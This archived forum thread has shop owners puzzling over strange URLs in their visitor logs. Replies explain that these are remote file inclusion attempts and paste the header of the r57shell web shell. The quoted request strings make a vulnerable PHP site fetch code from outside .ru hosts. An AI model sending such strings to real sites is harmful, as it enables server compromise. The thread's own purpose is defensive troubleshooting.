Jump to content



Photo
- - - - -

Strange Site showing up in who's online..


This topic has been archived. This means that you cannot reply to this topic.
7 replies to this topic

#1   rkoechel2004

rkoechel2004
  • Members
  • 126 posts

Posted 04 November 2007 - 21:21

The last couple days I've noticed in my who's online page that there is the following site showing up sometimes. Any idea what this is or why its happening?

/product_info.php?cPath=http://amyru.h18.ru/images/cs.txt?

Thanks
Ryan
rkoechel2004

#2   rkoechel2004

rkoechel2004
  • Members
  • 126 posts

Posted 04 November 2007 - 21:52

The last couple days I've noticed in my who's online page that there is the following site showing up sometimes. Any idea what this is or why its happening?

/product_info.php?cPath=http://amyru.h18.ru/images/cs.txt?

Thanks
Ryan



I'm also getting this url appended to the cPath: http://rumusic.chat.ru/rumusic.wav?
rkoechel2004

#3   rkoechel2004

rkoechel2004
  • Members
  • 126 posts

Posted 06 November 2007 - 00:45

I'm also getting this url appended to the cPath: http://rumusic.chat.ru/rumusic.wav?



Another new one today with the ip of the user from Canada:

/product_info.php?products_id=http://0x0134.lan.io/pb.php?

Anyone have any thoughts on this?
rkoechel2004

#4   anybeads

anybeads
  • Members
  • 9 posts

Posted 09 November 2007 - 10:57

I got the follow one:
http://amygirl.chat....mages/image.txt?
http://ninaru.hut2.ru/images/cs.txt?
http://amyru.h18.ru/images/cs.txt?
etc

Is it a hacking attempt?

We are using 6.15, is our site safe?

Any help is appreciated, thanks!

David
anybeads.com

#5   rkoechel2004

rkoechel2004
  • Members
  • 126 posts

Posted 14 November 2007 - 00:56

I got the follow one:
http://amygirl.chat....mages/image.txt?
http://ninaru.hut2.ru/images/cs.txt?
http://amyru.h18.ru/images/cs.txt?
etc

Is it a hacking attempt?

We are using 6.15, is our site safe?

Any help is appreciated, thanks!

David
anybeads.com


I saw this one today: http://kiopmanminsuion.chat.ru/http?

Does anyone have an idea where this is coming from?
rkoechel2004

#6   Wizky

Wizky
  • Members
  • 1 posts

Posted 18 November 2007 - 00:57

Hello rkoechel2004,
what you are seeing is an injection code in your site.

Injection is when some hackers inject this type of info in a site that the server is not secure.

In my servers I see this type of attacks every minute, but we do a really good job blocking them. I will sugest that you ask your hosting provider to install a really good firewall system as it seems it lacks of this.

The worst is that if they have managed to install this injection, they could install a sombie script as well.

Edited by Wizky, 18 November 2007 - 00:59.


#7   baddog

baddog
  • Members
  • 1,150 posts

Posted 01 December 2007 - 03:31

The last couple days I've noticed in my who's online page that there is the following site showing up sometimes. Any idea what this is or why its happening?

/product_info.php?cPath=http://amyru.h18.ru/images/cs.txt?

Thanks
Ryan

I'm seeing the same thing. Check out this thread: http://forums.creloa...ic/p=91071.html

#8   vincent_g

vincent_g
  • Members
  • 3 posts

Posted 26 December 2007 - 16:15

I'm seeing the same thing. Check out this thread: http://forums.creloa...ic/p=91071.html


Check Your site for this file dir.php
This is what he downloads!
<?php
/********************************************************************************
**********************/
/*
/* # # # # # #
/* # # # # # #
/* # # # # # #
/* # # ## #### ## # #
/* # # ## ## # # ## ## # #
/* # # ## ## # # ## ## # #
/* # #### ## # # ## #### #
/* # ### ############ ### #
/* # ########## ########## #
/* # ###### ###### #
/* # ######## ## #### ## ####### #
/* # ### ## #### #### ## ### #
/* # ### ## ## ## ## ## ### #
/* # ### # ## #### ## # ### #
/* # ### ## ## ## ## ## ### #
/* # ## # ## ## # ## #
/* # ## # #### # ## #
/* # ## ## #
/*
/*
/*
/* r57shell.php - ñêðèïò íà ïõï ïîçjâîëÿþùèé âàì âûïîëíÿòü ñèñòåìíûå êîìàíäû íà ñåðâåðå ÷åðåç áðàóçåð
/* Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru
/* Âåðñèÿ: 1.3 (05.03.2006)

This for some reason does not display right - it's a picture of a Spider

This hacker is hitting all PHP apps looking for security holes.
If you don't have the latest version which I assume blocks this type of hacker attack then you may have been hacked.

Firewalls do not stop this type of attack since it's a Software security problem.
Firewalls prevent Port access and not software execution.
The newest version of PHP is helpful in preventing this type of thing.
Modsecurity which is installed on a server is very good at stopping many such types of attacks but rules need to be added to keep up with the newest attack method.
The way the hacker gets in is by passing the text file to your server - cs.txt
This happens due to poor coding methods that do not prevent this type of thing.
When a URL of this type is passed the app accepts it and the server copies the cs.txt file to the tmp directory.
He then may download other files to your server by this same manner.

Again if you suspect you have been hacked then look around for files that do not belong to you.

Edited by vincent_g, 26 December 2007 - 16:18.